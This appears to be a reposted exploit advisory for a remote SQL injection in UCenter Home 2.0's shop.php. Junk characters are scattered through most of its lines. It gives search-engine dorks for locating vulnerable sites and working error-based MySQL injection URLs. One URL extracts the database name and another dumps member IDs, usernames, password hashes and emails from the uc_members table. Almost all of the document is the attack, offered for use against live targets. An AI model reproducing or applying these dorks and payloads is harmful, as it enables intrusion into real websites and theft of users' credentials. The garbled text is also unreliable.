5 K- a# _! t( T& }9 Z, g' D. b ]
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ 4 B: i" i( s2 K1 \
4 P( h, ~/ |. q( p, V
p- g9 a7 w' Z9 [: L
) d4 h5 @9 |" ]2 m; Q# h7 E0 z
*/ Author : KnocKout
Y* ~) w" d r: x* \
* l$ { h- ]0 p1 h/ j7 o*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
1 x& a. i& m9 G6 ~% r- k9 D( P9 `6 X4 C6 w0 h8 j2 ~( E
*/ Contact: knockoutr@msn.com 3 ~9 F. t( B. a; s1 |
& c3 ~( E9 G2 L' J
*/ Cyber-Warrior.org/CWKnocKout
/ B6 {$ k+ S! |0 K4 f; p" E2 n' f5 h' k: G% I1 ?
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 5 K* a: N! Q, ^. X0 T; m @
. J9 u v% `' c/ q6 n" }Script : UCenter Home
+ G" t8 L5 O' z. e( P/ w! O: j: D4 ]4 @! m$ {$ P( `8 M6 V
Version : 2.0
8 o* R3 k1 J5 b1 _3 j9 S+ h% B5 V, I: S7 ?- a' q4 N8 q
Script HomePage : http://u.discuz.net/
( G: U$ e2 W- ]% V5 O: j! d2 H7 \1 t, B
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
4 |' c; x* p" e8 ?1 O- E
! i9 Q# D# f C; \Dork : Powered by UCenter inurl:shop.php?ac=view
8 |" V! D1 A; x# c# I0 z! v* S, q
Dork 2 : inurl:shop.php?ac=view&shopid=
% O0 Y+ |# ?* A' a( i, }" u' m$ z+ [: p. a2 e
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
2 Q0 X- V& [" R3 n
! U C& r; D* VVuln file : Shop.php
- Y8 [9 }0 v% k6 X2 N5 }& @
' p' F) v* j- W- Q7 yvalue's : (?)ac=view&shopid= 6 U+ k M9 v, G
3 j' i4 _! O; r1 E* L& |7 \; }; L
Vulnerable Style : SQL Injection (MySQL Error Based) * r1 C* {7 Y" a$ W2 J7 ]
% y* T# A1 W& t( @2 `. ]3 B6 T, TNeed Metarials : Hex Conversion * U- H( @( ?3 \' S. Q
/ w$ [! k8 N* m4 Z
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
3 E7 v( j# c/ P2 F3 r6 A$ E- `% s! b, e6 D- L- }* ^7 K7 Y
Your Need victim Database name.
( E0 n7 g- e+ l! v0 r" _' W4 A3 M% T. u7 D+ u
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
q6 r7 i% B: z; [6 s+ u& z% W: N1 f1 t
..
6 z. C4 W/ Y X9 ]: k, C6 `7 Y& j9 A
) T6 Y0 k9 Z) M, V9 B) DDB : Okey. . L/ I$ a, v: ^, f/ }: c! D
( X6 w" n9 C1 z
your edit DB `[TARGET DB NAME]` n9 H, P# U7 M4 b# `, @* z
& @ u! Y* F2 W2 ?2 o0 \Example : 'hiwir1_ucenter' 8 t, S5 ~1 j6 P) {
$ w. K, P6 K" U1 _( N
Edit : Okey. 1 D/ n2 x7 u) \8 R9 E2 ^
% v. m; C: i! [6 c# ^0 @, XYour use Hex conversion. And edit Your SQL Injection Exploit..
. D' s6 Q P- k' {" j# V
+ e4 r3 L( r1 S
+ K! L! o4 x1 Z
7 S2 g( g; {0 `: G; n' YExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 . y" b/ o5 N: t
|